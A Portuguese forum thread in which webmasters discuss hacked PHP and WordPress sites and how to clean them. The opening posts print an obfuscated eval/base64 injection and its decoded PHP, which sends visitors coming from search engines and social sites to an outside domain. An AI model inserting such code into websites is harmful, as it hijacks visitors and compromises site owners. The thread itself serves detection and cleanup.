← Segurança

Sites hackeados - codigo que direcciona as pesquisas do google para outros sites

Lida 4753 vezes

Offline

epsy 
Membro
Mensagens 553 Gostos 1
Feedback +1

Troféus totais: 25
Trófeus: (Ver todos)
Search Windows User Super Combination Combination Topic Starter Poll Voter Level 4 Level 3 Level 2 Level 1

Este problema surgiu recentemente num site de um utilizador, e como houve outros utilizadores que disseram que também encontraram este código nos seus sites, criei este tópico.

A causa do problema é um código malicioso que verifica se uma página foi chamada a partir de um link oriundo de determinados sites (google, bing, facebook, etc), e em caso afirmativo direcciona o visitante para outros sites.


O código é inserido pelo hacker nas páginas php dos sites e normalmente começa assim:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7

A solução é:

Verificar todos os files que tenham sido alterados e que possam ter esse código e substituí-los pelos ficheiros originais.

Tentar descobrir como é que acederam ao site. Mudar as passwords de alojamento (ftp, control panel, etc).

Verificar as permissões das pastas e ficheiros.
Offline

epsy 
Membro
Mensagens 553 Gostos 1
Feedback +1

Troféus totais: 25
Trófeus: (Ver todos)
Search Windows User Super Combination Combination Topic Starter Poll Voter Level 4 Level 3 Level 2 Level 1

Mais informações podem ser consultadas aqui: http://productforums.google.com/forum/#!topic/webmasters/XQJd-y3ohWs


Em sites wordpress por vezes o ficheiro hackeado é o wp-config.php, mas pode haver outros ficheiros infectados.

O código maligno descodificado fica mais ou menos assim:

Código: (php) [Seleccione]
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://www6.uiopqw.jkub.com/");
exit();
}
}
}
}
}
Offline

Bernardo Cordeiro 
Membro
Mensagens 242 Gostos 0
Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

epsy, não é preciso ter acesso à tua conta. Basta ter acesso a uma qualquer do alojamento onde está a tua conta :-D



Sent using Tapatalk 2 for Android
Offline

epsy 
Membro
Mensagens 553 Gostos 1
Feedback +1

Troféus totais: 25
Trófeus: (Ver todos)
Search Windows User Super Combination Combination Topic Starter Poll Voter Level 4 Level 3 Level 2 Level 1

epsy, não é preciso ter acesso à tua conta. Basta ter acesso a uma qualquer do alojamento onde está a tua conta :-D


O alojamento partilhado tem sempre riscos acrescidos, claro. Mas se um servidor estiver correctamente configurado, se o sistema de permissões estiver bem definido, se os utilizadores tiverem cuidados com a segurança dos seus PC's, com a seguranças das passwords que usam, se tiverem as permissões das suas contas bem definidas, os riscos são muiiiito mais reduzidos.

Eu até estou admirado de o pessoal do alojamento ainda não te ter respondido. :)
Offline

cenourinha 
Elite
Mensagens 4094 Gostos 21
Troféus totais: 34
Trófeus: (Ver todos)
Mobile User Apple User Level 6 Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4

Para quem utiliza o FileZilla, recomendo a não utilizar a opção Gestor de Sites para guardar os dados FTP, visto que os mesmos são gravados no computador como Plain-text.

Existem "virus" que utilizam as falhas do Flash e Adobe PDF Reader para obter acesso a este tipo de informações e adicionar os sites numa botnet de automatização de ataques, em que basicamente é feita uma autenticação básica via FTP, download dos ficheiros mais comuns, injecção do código e reenvio para o servidor.
Offline

Manuel Moreira 
Membro
Mensagens 228 Gostos 0
Feedback +1

Troféus totais: 20
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Poll Voter Level 4 Level 3 Level 2 Level 1 100 Posts 50 Posts

Não sou expert em segurança nem nada lá perto, mas arriscaría  que a maioria dos ataques em sites baseados em WP são feitos através de plugins.

Por isso apenas tenho os básicos e nos casos em  que tenho de ter mais plugins que o normal, verifico quase sempre se têm código "esquisito".

Se há coisa fácil é meter num plugin código codificado, até há formas de ser mais evoluído do que com o base64 e de cada vez que o referer for um motor de busca, fazer um redirect.